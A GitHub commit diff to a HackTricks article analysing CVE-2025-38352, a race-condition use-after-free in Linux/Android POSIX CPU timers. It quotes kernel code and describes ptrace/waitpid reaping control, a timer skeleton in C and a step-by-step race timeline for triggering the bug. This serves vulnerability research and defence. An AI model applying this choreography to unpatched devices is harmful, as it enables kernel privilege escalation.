Skip to content

Commit a807923

Browse files
authored
Merge pull request #1706 from HackTricks-wiki/update_CVE-2025-38352___In-the-wild_Android_Kernel_Vulner_20251222_130353
CVE-2025-38352 – In-the-wild Android Kernel Vulnerability An...
2 parents e6abd74 + 57a200a commit a807923

File tree

1 file changed

+123
-4
lines changed

1 file changed

+123
-4
lines changed

src/linux-hardening/privilege-escalation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md

Lines changed: 123 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -80,6 +80,9 @@ Two expiry-processing modes
8080
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: expiry is deferred via task_work on the target task
8181
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: expiry handled directly in IRQ context
8282

83+
<details>
84+
<summary>Task_work vs IRQ expiry paths</summary>
85+
8386
```c
8487
void run_posix_cpu_timers(void) {
8588
struct task_struct *tsk = current;
@@ -100,8 +103,13 @@ static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
100103
#endif
101104
```
102105
106+
</details>
107+
103108
In the IRQ-context path, the firing list is processed outside sighand
104109
110+
<details>
111+
<summary>IRQ-context delivery loop</summary>
112+
105113
```c
106114
static void handle_posix_cpu_timers(struct task_struct *tsk) {
107115
struct k_itimer *timer, *next; unsigned long flags, start;
@@ -126,6 +134,8 @@ static void handle_posix_cpu_timers(struct task_struct *tsk) {
126134
}
127135
```
128136

137+
</details>
138+
129139
Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit
130140
Preconditions
131141
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (IRQ path in use)
@@ -139,6 +149,52 @@ Sequence
139149
4) Immediately after unlock, the exiting task can be reaped; a sibling thread executes posix_cpu_timer_del().
140150
5) In this window, posix_cpu_timer_del() may fail to acquire state via cpu_timer_task_rcu()/lock_task_sighand() and thus skip the normal in-flight guard that checks timer->it.cpu.firing. Deletion proceeds as if not firing, corrupting state while expiry is being handled, leading to crashes/UB.
141151

152+
### How release_task() and timer_delete() free firing timers
153+
Even after handle_posix_cpu_timers() has taken the timer off the task list, a ptraced zombie can still be reaped. The waitpid() stack drives release_task() → __exit_signal(), which tears down sighand and the signal queues while another CPU is still holding pointers to the timer object:
154+
155+
```c
156+
static void __exit_signal(struct task_struct *tsk)
157+
{
158+
struct sighand_struct *sighand = lock_task_sighand(tsk, NULL);
159+
// ... signal cleanup elided ...
160+
tsk->sighand = NULL; // makes future lock_task_sighand() fail
161+
unlock_task_sighand(tsk, NULL);
162+
}
163+
```
164+
165+
With sighand detached, timer_delete() still returns success because posix_cpu_timer_del() leaves `ret = 0` when locking fails, so the syscall proceeds to free the object via RCU:
166+
167+
```c
168+
static int posix_cpu_timer_del(struct k_itimer *timer)
169+
{
170+
struct sighand_struct *sighand = lock_task_sighand(p, &flags);
171+
if (unlikely(!sighand))
172+
goto out; // ret stays 0 -> userland sees success
173+
// ... normal unlink path ...
174+
}
175+
```
176+
177+
```c
178+
SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
179+
{
180+
if (timer_delete_hook(timer) == TIMER_RETRY)
181+
timer = timer_wait_running(timer, &flags);
182+
posix_timer_unhash_and_free(timer); // call_rcu(k_itimer_rcu_free)
183+
return 0;
184+
}
185+
```
186+
187+
Because the slab object is RCU-freed while IRQ context still walks the `firing` list, reuse of the timer cache becomes a UAF primitive.
188+
189+
### Steering reaping with ptrace + waitpid
190+
The easiest way to keep a zombie around without it being auto-reaped is to ptrace a non-leader worker thread. exit_notify() first sets `exit_state = EXIT_ZOMBIE` and only transitions to EXIT_DEAD if `autoreap` is true. For ptraced threads, `autoreap = do_notify_parent()` remains false as long as SIGCHLD is not ignored, so release_task() only runs when the parent explicitly calls waitpid():
191+
192+
- Use pthread_create() inside the tracee so the victim is not the thread-group leader (wait_task_zombie() handles ptraced non-leaders).
193+
- Parent issues `ptrace(PTRACE_ATTACH, tid)` and later `waitpid(tid, __WALL)` to drive do_wait_pid() → wait_task_zombie() → release_task().
194+
- Pipes or shared memory convey the exact TID to the parent so the correct worker is reaped on demand.
195+
196+
This choreography guarantees a window where handle_posix_cpu_timers() can still reference `tsk->sighand`, while a subsequent waitpid() tears it down and allows timer_delete() to reclaim the same k_itimer object.
197+
142198
Why TASK_WORK mode is safe by design
143199
- With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry is deferred to task_work; exit_task_work runs before exit_notify, so the IRQ-time overlap with reaping does not occur.
144200
- Even then, if the task is already exiting, task_work_add() fails; gating on exit_state makes both modes consistent.
@@ -159,7 +215,18 @@ Impact
159215

160216
Triggering the bug (safe, reproducible conditions)
161217
Build/config
162-
- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix.
218+
- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix. On x86/arm64 the option is normally forced on via HAVE_POSIX_CPU_TIMERS_TASK_WORK, so researchers often patch `kernel/time/Kconfig` to expose a manual toggle:
219+
220+
```c
221+
config POSIX_CPU_TIMERS_TASK_WORK
222+
bool "CVE-2025-38352: POSIX CPU timers task_work toggle" if EXPERT
223+
depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
224+
default y
225+
```
226+
227+
This mirrors what Android vendors did for analysis builds; upstream x86_64 and arm64 force HAVE_POSIX_CPU_TIMERS_TASK_WORK=y, so the vulnerable IRQ path mainly exists on 32-bit Android kernels where the option is compiled out.
228+
229+
- Run on a multi-core VM (e.g., QEMU `-smp cores=4`) so parent, child main, and worker threads can stay pinned to dedicated CPUs.
163230

164231
Runtime strategy
165232
- Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock):
@@ -191,9 +258,58 @@ void *deleter(void *arg) {
191258

192259
- Race amplifiers: high scheduler tick rate, CPU load, repeated thread exit/re-create cycles. The crash typically manifests when posix_cpu_timer_del() skips noticing firing due to failing task lookup/locking right after unlock_task_sighand().
193260

194-
Detection and hardening
195-
- Mitigation: apply the exit_state guard; prefer enabling CONFIG_POSIX_CPU_TIMERS_TASK_WORK when feasible.
196-
- Observability: add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del(); alert when it.cpu.firing==1 is observed together with failed cpu_timer_task_rcu()/lock_task_sighand(); watch for timerqueue inconsistencies around task exit.
261+
### Practical PoC orchestration
262+
#### Thread & IPC choreography
263+
A reliable reproducer forks into a ptracing parent and a child that spawns the vulnerable worker thread. Two pipes (`c2p`, `p2c`) deliver the worker TID and gate each phase, while a `pthread_barrier_t` prevents the worker from arming its timer until the parent has attached. Each process or thread is pinned with `sched_setaffinity()` (e.g., parent on CPU1, child main on CPU0, worker on CPU2) to minimize scheduler noise and keep the race reproducible.
264+
265+
#### Timer calibration with CLOCK_THREAD_CPUTIME_ID
266+
The worker arms a per-thread CPU timer so that only its own CPU consumption advances the deadline. A tunable `wait_time` (default ≈250 µs of CPU time) plus a bounded busy loop ensure that `exit_notify()` sets `EXIT_ZOMBIE` while the timer is just about to fire:
267+
268+
<details>
269+
<summary>Minimal per-thread CPU timer skeleton</summary>
270+
271+
```c
272+
static timer_t timer;
273+
static long wait_time = 250000; // nanoseconds of CPU time
274+
275+
static void timer_fire(sigval_t unused) {
276+
puts("timer fired");
277+
}
278+
279+
static void *worker(void *arg) {
280+
struct sigevent sev = {0};
281+
sev.sigev_notify = SIGEV_THREAD;
282+
sev.sigev_notify_function = timer_fire;
283+
timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer);
284+
285+
struct itimerspec ts = {
286+
.it_interval = {0, 0},
287+
.it_value = {0, wait_time},
288+
};
289+
290+
pthread_barrier_wait(&barrier); // released by child main after ptrace attach
291+
timer_settime(timer, 0, &ts, NULL);
292+
293+
for (volatile int i = 0; i < 1000000; i++); // burn CPU before exiting
294+
return NULL; // do_exit() keeps burning CPU
295+
}
296+
```
297+
298+
</details>
299+
300+
#### Race timeline
301+
1. Child tells the parent the worker TID via `c2p`, then blocks on the barrier.
302+
2. Parent `PTRACE_ATTACH`es, waits in `waitpid(__WALL)`, then `PTRACE_CONT` to let the worker run and exit.
303+
3. When heuristics (or manual operator input) suggest the timer was collected into the IRQ-side `firing` list, the parent executes `waitpid(tid, __WALL)` again to trigger release_task() and drop `tsk->sighand`.
304+
4. Parent signals the child over `p2c` so child main can call `timer_delete(timer)` and immediately run a helper such as `wait_for_rcu()` until the timer’s RCU callback completes.
305+
5. IRQ context eventually resumes `handle_posix_cpu_timers()` and dereferences the freed `struct k_itimer`, tripping KASAN or WARN_ON()s.
306+
307+
#### Optional kernel instrumentation
308+
For research setups, injecting a debug-only `mdelay(500)` inside handle_posix_cpu_timers() when `tsk->comm == "SLOWME"` widens the window so the above choreography almost always wins the race. The same PoC also renames threads (`prctl(PR_SET_NAME, ...)`) so kernel logs and breakpoints confirm the expected worker is being reaped.
309+
310+
### Instrumentation cues during exploitation
311+
- Add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del() to spot cases where `it.cpu.firing==1` coincides with failed cpu_timer_task_rcu()/lock_task_sighand(); monitor timerqueue consistency when the victim exits.
312+
- KASAN typically reports `slab-use-after-free` inside posix_timer_queue_signal(), while non-KASAN kernels log WARN_ON_ONCE() from send_sigqueue() when the race lands, giving a quick success indicator.
197313
198314
Audit hotspots (for reviewers)
199315
- update_process_times() → run_posix_cpu_timers() (IRQ)
@@ -209,5 +325,8 @@ Notes for exploitation research
209325
- [Race Against Time in the Kernel’s Clockwork (StreyPaws)](https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/)
210326
- [Android security bulletin – September 2025](https://source.android.com/docs/security/bulletin/2025-09-01)
211327
- [Android common kernel patch commit 157f357d50b5…](https://android.googlesource.com/kernel/common/+/157f357d50b5038e5eaad0b2b438f923ac40afeb%5E%21/#F0)
328+
- [CVE-2025-38352 – In-the-wild Android Kernel Vulnerability Analysis and PoC](https://faith2dxy.xyz/2025-12-22/cve_2025_38352_analysis/)
329+
- [poc-CVE-2025-38352 (GitHub)](https://github.com/farazsth98/poc-CVE-2025-38352)
330+
- [Linux stable fix commit f90fff1e152d](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f90fff1e152dedf52b932240ebbd670d83330eca)
212331
213332
{{#include ../../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)